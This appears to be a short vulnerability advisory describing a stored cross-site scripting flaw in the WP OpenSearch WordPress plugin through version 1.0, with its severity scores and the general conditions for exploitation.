The plugin allows an attacker to store malicious scripts that are executed whenever a site visitor loads a page that displays the affected content. This stored XSS flaw gives the attacker the ability to run arbitrary JavaScript in the context of the site, potentially stealing credentials, defacing content, or redirecting users to malicious domains. The impact is a breach of confidentiality and integrity for any user of the site, and could also be used to spread malware or phishing pages.

The vulnerability affects the WP OpenSearch WordPress plugin, all versions from the initial release up to and including version 1.0. The plugin is distributed through the WordPress plugin repository under the vendor name sav.

The CVSS base score is 7.1, indicating a high severity, while the EPSS score is noted as less than 1 %, suggesting a low probability of exploitation in the short term. The flaw is not currently listed in the CISA KEV catalog. Because the vulnerability is a stored XSS, it can be exploited by an attacker who can inject input that will be persisted and rendered, typically by submitting a form or other user‑generated content on the site. No network isolation or authentication is required beyond access to the site’s content creation interface.